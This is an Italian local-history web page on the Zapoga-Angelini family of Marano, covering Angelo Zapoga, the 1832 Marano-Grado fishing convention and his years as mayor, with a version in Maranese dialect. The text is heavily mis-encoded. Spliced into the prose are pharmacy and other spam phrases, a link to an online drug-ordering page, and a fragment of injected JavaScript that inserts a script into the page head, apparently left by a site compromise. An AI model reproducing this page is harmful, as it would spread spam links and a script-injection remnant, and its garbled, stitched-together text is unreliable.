Cognomi maranesi Zapoga-Angelini

La figlia del notaio Angelini Angelo, cancelliere veneto della seconda metAi?? del Settecento sposA? il giovane tenente Spiridione Zapoga che divenne giudice della ComunitAi?? di Marano. Prima di ricevere lai??i??incarico per la fortezza di Marano Spiridione combatteva nelle valli bergamasche contro i francesi.Ebbero Angelo Zapoga, possidente come celebrano le cronache e primo regio sindaco di Marano. Angelo era nato il 3.3.1800 e sposA? nellai??i??ottobre del 1833, durante il regno lombardoai??i??veneto, la contessa Giulia dai??i??Arcano, nobile castellana, appartenente allai??i??antichissima famiglia friulana degli Arcano. Era nata a Udine nel 1810 e visse per ottanta ani e poco piA?. (Anticamente gli Arcano erano detti Tricano, cioA? tre cani come compare nello stemma araldico, poi divenuti Arcano, investiti dei titoli nobiliari dal patriarca di Aquileia nel lontano XII secolo, partecipando alle sedute del Parlamento della Patria del Friuli). Nel 1832 il giorno 27 marzo a Monastero dai??i??Aquileia, Angelo Zapoga venne inviato dalla ComunitAi?? di Marano come procuratore comunale con illimitata facoltAi?? di poter trattare, davanti ad Ai??interlocutori gradesi e amministratori locali, stipulando la nota Convenzione tra Marano e Grado, conosciuta come Convenzione Monastero, relativa ai diritti di pesca in laguna tra i due Comuni. Lai??i??oggetto della Convenzione riguardava la spartizione dellai??i??attivitAi?? peschereccia delle due comunitAi?? Marano e Grado, note nelle sedi giudiziarie per i continui litigi intrapresi per accaparrarsi zone lagunari di pesca. La Convenzione dunque veniva a stabilire nuovi confini lagunari fra gradesani e maranesi, i primi non potevano piA? intervenire allai??i??interno della laguna (verso) S.Andrea e di erigere online casoni ad uso di pesca, i maranesi cedevano le acque poste verso Levante dei due importanti fiumi quali erano lai??i??Aussa e lai??i??Anfora. (Ma questa convenzione sarAi?? criticata dallai??i??Olivotto, anni dopo,Ai?? con estremo vigore per Ai??le decisione prese). Con la fine del regno lombardo-veneto (1815-1866) Angelo Zapoga divenne sindaco nel 1867, primo regio sindaco del nuovo governo italiano, dopo le vittorie delle guerre risorgimentali contro gli austriaci. Il nuovo sindaco come prima attivitAi?? amministrativa chiese ed ottenneAi?? che la ComunitAi?? venisse affrancata dalla regalAi??a feudale di fiorini 2 e 4 soldi, come canone perpetuo per lai??i??uso della pesca in fiume Stella, denaro che la ComunitAi?? doveva elargire ogni anno per poter appostare le reti in quel territorio. Zapoga durA? in carica fino al 1880, gli subentrA? poi il piA? noto sindaco Rinaldo Olivotto, ma con questo sindaco era tutta unai??i??altra storia.

Buy online

In dialetto maranese:

La fia del notaio Angelo Angellini, canselier venessian de la seconda parte del Setesento, la veva sposA? el zovene tenente Spiridion Zapoga, che dopo el ze deventA? zudese de la fortessa o de la ComunitAi??e. I ga vesto Angelo Zapoga, possidente, come che se lesi, chai??i??el deventa el primo regio sindaco de Maran. Angelo el gera nato el tre marso del 1800 e el ga sposA? in tel 1833 co geremo nel regno lombaro-veneto la contessa Giulia dai??i??Arcano, una nobile de antichissima fameia furlana. La gera nata a Udine intel 1810 e la ga vissA?o otanta ani e un poco piA?. (La fameia dei Arcano, dita dei Tricano la gera stada investAi??a del titola dal patriarca de Aquileia e la ga partecipA? al Parlamento de la Patria del Friuli). El zorno 27 marzo 1832 a Monastero de Aquileia, Angelo Zapoga el se ga presentA? con Francesco Rossetto, procuraturi dela ComunitAi??e con la possibilitAi??e de tratAi?? Purchase costa allegra cruise ship disaster sensa limiti coi gresani e aministraturi. Quela volta i ga stipulA? la famosa (per altro criticada da lai??i??Olivotto anni dopo) Convension tra Maran e Grao, la Convension Monastero, come che la ze ciamada, relativa ai diritti de pesca in paluo tra i do comuni. Gera importante quela convension, parchA? la riguardeva la division del teritorio dele do comunitAi??e, za litigiose in campo giudissiario par so conto da piA? de tresento ani e sempre par acaparasse pusti de pescAi??. La Convension la stabiliva i niuvi cunfini de palA?o, i gradisi no i podeva piA? andAi?? a pescAi?? allai??i??interno del palA?o in tele acque de Santai??i??Andrea o de costruAi?? casuni, i maranisi i moleva come che i ga molA?, le acque messe verso Levante dei do fiumi Aussa e Anfora. Coai??i?? la fine del regno lombardo-veneto chai??i??el ze durA? dal 1815 al 1866 Angelo Zapoga el ze deventA? sindaco intel 1867, primo regio sindaco del niovo governo talian, dopo le vittorie dele guere de risorgimento contro i austriaci.

Pills purchase bentyl for ibs buy pills Purchase
http://www.locksafeandvaultja.com/2018/03/15/order-metoclopramide-10/

El niovo sindaco, come prima ativitAi??e el ga domandA? subito e el ga otegnA?o che la ComunitAi?? la vignissi afrancada dela regalAi??a adiritura de tipo feudal de fiorini 2 e 4 soldi, che gera un canone perpetuo che la doveva pagAi?? par lai??i??uso dela pesca inAi?? fiume Stela.

Angelo Zapoga el ga durA? in carica fin al 1880, dopo ze subentrA? el piA? cognossuo Olivotto, ma con Rinaldo ze stA? duta unai??i??altra storia.

A cura di Maria Teresa Corso

Buy d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Lascia una risposta

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo